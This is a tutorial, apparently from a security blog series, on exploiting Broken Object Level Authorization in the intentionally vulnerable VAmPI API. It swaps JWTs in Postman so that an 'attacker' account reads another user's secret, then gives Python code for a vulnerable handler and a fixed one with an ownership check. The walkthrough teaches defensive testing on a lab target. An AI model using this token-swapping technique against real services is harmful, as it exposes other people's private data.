Stratos Ally

Broken Object Level Authorization in VAmPI: Part 4 – Advanced Techniques

StratosAlly

**Note: The content in this article is only for educational purposes and understanding of cybersecurity concepts. It should enable people and organizations to have a better grip on threats and know how to protect themselves against them. Please use this information responsibly.** 

Broken Object Level Authorization (BOLA) is a critical vulnerability in APIs that occurs when an application allows unauthorized access to objects (such as records, data entries, or resources). This issue arises when the API fails to properly enforce user-level permissions, allowing users to access or manipulate data belonging to other users without appropriate authorization checks. 

How BOLA Occurs: APIs often expose endpoints that interact with sensitive data, and these endpoints typically use object identifiers (IDs) to retrieve specific records. If the API only relies on these IDs and lacks robust authorization mechanisms, an attacker can manipulate the ID in API requests to access or modify objects that belong to other users. 

Before the walkthrough, install VAmPI and Postman. If you have not already installed them, you can use the links below: 

1. Understanding and Installing VAmPI – A Vulnerable REST API (Part 1) – Stratos Ally 

2. Installing Postman: An API testing tool  – Stratos Ally 

Walkthrough of BOLA in VAmPI 

1. Register and Log In as Edward and Obtain a JWT

a) Register as Edward: /users/v1/register 

b) Log in as Edward: /users/v1/login 

Capture the JWT from the response. 

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MjIyMjgxODMsImlhdCI6MTcyMjIyODEyMywic3ViIjoiZWR3YXJkIn0.oh-CmJNYsucWVT5feVZrYyqnIpwkYSr5tdIw-J-lrM8 

c) Store Edward’s JWT in Postman: 

Save the JWT as a collection variable in Postman for easy access. 

Example variable name: edward_jwt. 

d) You can also use this bearer token for each request in the collection.

2. Create a New Book as Edward

Endpoint: POST /books/v1 

Authorization: Bearer {{edward_jwt}} 

Body:

```json
{
  "book_title": "Edward's Book",
  "secret": "Edward's Secret"
}
```

Send the request: 

Verify that the book is created successfully. 

3. Retrieve All Books

Endpoint: GET /books/v1 

Authorization: Bearer {{edward_jwt}} 

Send the request: 

Observe that the response lists all books in the database. 

Note that the “secret” field is not displayed. 

4. Understand Access Control Requirements

According to the readme file in the VAmPI GitHub repository, each book is unique to its owner. 

Only the owner should be able to view the secret. 

Endpoint: GET /books/v1/Edward’s Book 

5. Retrieve Edward's Book Details Using Another User's JWT (Attacker)

a) Register as Attacker: /users/v1/register

```json
{
  "username": "attacker",
  "password": "attacker",
  "email": "attacker@gmail.com"
}
```

b) Log in as Attacker: /users/v1/login 

Capture the JWT from the response. 

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE3MjIyMzAwOTIsImlhdCI6MTcyMjIzMDAzMiwic3ViIjoiYXR0YWNrZXIifQ.U8dMhwGO3_gkbNf8yYYxzam7dbiubPMpl0WdgRbgqWU 

c) Store the Attacker's JWT in Postman:

Save the JWT as a collection variable in Postman for easy access. 

Variable name: attacker_jwt. 

d) Update the Authorization tab in the collection to use {{attacker_jwt}}. 

e) Endpoint: GET /books/v1/Edward's Book

Send the request: 

Observe that the response includes the book’s title, the submitting user, and the secret. 

We successfully exploited a BOLA vulnerability: the user attacker, who should not have access, could view Edward's book details, including the secret. This type of vulnerability arises when the endpoint authenticates the caller but never compares the caller's identity to the owner of the requested object, thus allowing unauthorized users to access restricted data.
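To make the defect concrete, here is an added example (not VAmPI's own code) of the lookup behind GET /books/v1/{book_title}: a handler that only authenticates the caller beside one that also checks object ownership. The in-memory store, the handler names and the response shapes are constructed for illustration; the JWT helper assumes the token's signature was already verified upstream and only reads the `sub` claim.

```python
import base64
import json

# JWTs copied from the walkthrough above (sub = "edward" and sub = "attacker").
EDWARD_JWT = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
              "eyJleHAiOjE3MjIyMjgxODMsImlhdCI6MTcyMjIyODEyMywic3ViIjoiZWR3YXJkIn0."
              "oh-CmJNYsucWVT5feVZrYyqnIpwkYSr5tdIw-J-lrM8")
ATTACKER_JWT = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
                "eyJleHAiOjE3MjIyMzAwOTIsImlhdCI6MTcyMjIzMDAzMiwic3ViIjoiYXR0YWNrZXIifQ."
                "U8dMhwGO3_gkbNf8yYYxzam7dbiubPMpl0WdgRbgqWU")

# Constructed in-memory book store mirroring the book created in step 2.
BOOKS = {
    "Edward's Book": {"user": "edward", "secret": "Edward's Secret"},
}


def jwt_subject(token: str) -> str:
    """Return the 'sub' claim of a JWT. Assumption: the signature was verified
    by the framework before this is called; this only decodes the payload."""
    payload = token.split(".")[1]
    payload += "=" * (-len(payload) % 4)  # restore base64url padding
    return json.loads(base64.urlsafe_b64decode(payload))["sub"]


def get_book_vulnerable(title: str, token: str):
    """BOLA pattern: a valid JWT is enough to read ANY book's secret."""
    jwt_subject(token)  # authentication only; the caller is never compared to the owner
    book = BOOKS.get(title)
    if book is None:
        return 404, {"status": "fail", "message": "Book not found!"}
    return 200, {"book_title": title, "owner": book["user"], "secret": book["secret"]}


def get_book_fixed(title: str, token: str):
    """Object-level authorization: the requester must own the book."""
    requester = jwt_subject(token)
    book = BOOKS.get(title)
    if book is None or book["user"] != requester:
        # One response for "missing" and "not yours", so titles cannot be enumerated
        return 404, {"status": "fail", "message": "Book not found!"}
    return 200, {"book_title": title, "owner": book["user"], "secret": book["secret"]}
```

With the hardened handler the attacker's request from step 5 receives the same 404 as a nonexistent title, while Edward's own request still returns the secret.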
